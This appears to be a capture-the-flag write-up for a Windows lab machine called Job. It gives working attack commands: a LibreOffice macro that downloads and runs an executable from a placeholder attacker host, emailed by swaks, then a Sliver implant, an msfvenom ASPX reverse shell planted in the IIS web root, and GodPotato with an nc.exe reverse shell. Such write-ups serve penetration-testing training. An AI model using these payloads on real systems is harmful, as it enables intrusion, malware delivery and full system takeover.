Skip to main content

Machine (Medium) - Job

Writeup for the Job machine, a Windows-based box involving malicious macro delivery via SMTP, remote code execution through LibreOffice, and privilege escalation using exposed web paths and token impersonation.

Writeup Author: BobBuilder

Objective: Exploit an email-based document parsing service and escalate to SYSTEM via web-based payload execution.

Category Difficulty Platform Machine Author
Machine Medium Windows xct

User

Port Scan

Nmap revealed the following open ports on <job_ip>:

  • 25: hMailServer (SMTP)
  • 80: Microsoft IIS 10.0 (HTTP)
  • 445: SMB
  • 3389: RDP with domain name JOB

Exploit Document Parser via SMTP

The website indicates:

"Please send your application to career@job.local as a LibreOffice document."

We create a malicious .ods document with a macro that fetches and executes a reverse shell:

Sub Main
    Shell("cmd /c powershell ""curl http://<attacker_ip>/vl.exe -o C:\Users\Public\Downloads\vl.exe;C:\Users\Public\Downloads\vl.exe""")
End Sub

We generate the payload with Sliver:

sliver > generate --os windows -f exe --mtls <attacker_ip> --reconnect 60 --save vl.exe

We send the malicious document via SMTP using swaks:

swaks --to career@job.local --from attacker@evil.com \
  --header "Subject: Job Application" \
  --body "Please find my resume attached." \
  --attach-type application/vnd.oasis.opendocument.text \
  --attach sliver.ods

Sliver Callback and Shell

We receive a callback from vl.exe, landing a low-privilege shell as jack.black.

We upload winPEAS for local enumeration:

sliver > upload winPEASx64.exe C:\Users\Public\Downloads\peas.exe

Enumeration and Pivot to Web Root

We discover two interesting files:

C:\Users\jack.black\Documents\Default.rdp
C:\inetpub\wwwroot\hello.aspx

This confirms the user can write to the IIS web root.

Web Shell for Privilege Escalation

We generate a Meterpreter ASPX payload and place it in the web root:

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp \
  LHOST=<tun0_ip> LPORT=4445 -f aspx > indx.aspx

Upload to:

C:\inetpub\wwwroot\indx.aspx

Trigger the shell:

http://job.vl/indx.aspx

Meterpreter Session and Token Privileges

Once connected via:

msf6 > use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
run

Check privileges:

meterpreter > getprivs

Found:
SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc. — good for token-based escalation.

Root

Abuse Token Impersonation for SYSTEM

We use a tool like GodPotato to impersonate SYSTEM and trigger a reverse shell:

C:\Users\Public\Downloads\god.exe -cmd "C:\Users\Public\Downloads\nc.exe <attacker_ip> 4446 -e cmd.exe"

Catch the shell on your listener:

nc -lvnp 4446

You now have a SYSTEM shell.

Back to top